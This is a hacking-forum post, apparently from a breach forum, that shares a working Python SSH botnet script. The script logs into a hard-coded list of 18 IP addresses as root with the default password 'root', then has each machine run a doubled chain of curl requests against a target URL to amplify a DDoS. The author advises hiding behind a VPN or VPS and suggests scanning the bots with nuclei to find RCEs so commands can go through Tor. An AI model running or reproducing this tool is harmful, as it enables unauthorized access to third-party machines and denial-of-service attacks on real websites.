01-01-2025, 06:01 PM
Here's a simple SSH botnet made from honeypots.
Numerous honeypots are linked to the intranet, some intentionally designed for hacking. During my investigation into the cracked SSH credentials, I discovered that curl was enabled. By concatenating curl commands, I was able to amplify the DDOS capability. Please use a VPN or VPS while running this script.
Possible improvements: Because the bots are honeypots, you can try running nuclei with the -t CVES/ option to look for web-based RCEs. This could allow you to use Tor to send commands instead of SSH.
Numerous honeypots are linked to the intranet, some intentionally designed for hacking. During my investigation into the cracked SSH credentials, I discovered that curl was enabled. By concatenating curl commands, I was able to amplify the DDOS capability. Please use a VPN or VPS while running this script.
Possible improvements: Because the bots are honeypots, you can try running nuclei with the -t CVES/ option to look for web-based RCEs. This could allow you to use Tor to send commands instead of SSH.
import concurrent.futures
import time
from paramiko import SSHClient, AutoAddPolicy
class botnet:
def __init__(self, url: str):
self.url = url
self.bots = ["172.105.7.122","208.83.238.82","174.138.9.176","139.162.118.148","45.33.22.76","143.42.63.163","139.144.26.91","139.144.26.14","139.144.26.231","143.42.229.125","143.42.229.113","139.180.206.8","194.68.44.161","139.144.26.71","143.42.229.133","45.79.141.174","143.42.229.124","143.42.229.140"]
self.threads = 5#len(self.bots)
self.requests = 10
self.active = []
def task(self, bot_ip):
try:
client = SSHClient()
client.set_missing_host_key_policy(AutoAddPolicy())
client.connect(bot_ip, username='root', password='root', timeout=10)
channel = client.invoke_shell()
channel.recv(1024)
channel.send('id')
output = channel.recv(1024)
if "root" in output.decode():
channel.close()
print(f"Connected to Bot {bot_ip}")
botnet_string = f"curl {self.url} ;"
#this improvement will concatinat the commands so we only have to sent 1 instead of 10 ssh requests for 10 packets
for cycle in range(1, self.requests):
botnet_string += botnet_string
stdin, stdout, stderr = client.exec_command(botnet_string)
client.close()
else:
pass
client.close()
except Exception as e:
#print(e)
#print(f"{bot_ip} Didn't connect")
pass
def machineGun(self):
with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = [executor.submit(self.task, x.strip()) for x in self.bots]
def main():
t = botnet("https://www.google.com")
for _ in range(10):
t.machineGun()
if __name__ == "__main__":
main()
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Self-Ban | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you wish to be unbanned in the future.
Ban Reason: Self-Ban | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you wish to be unbanned in the future.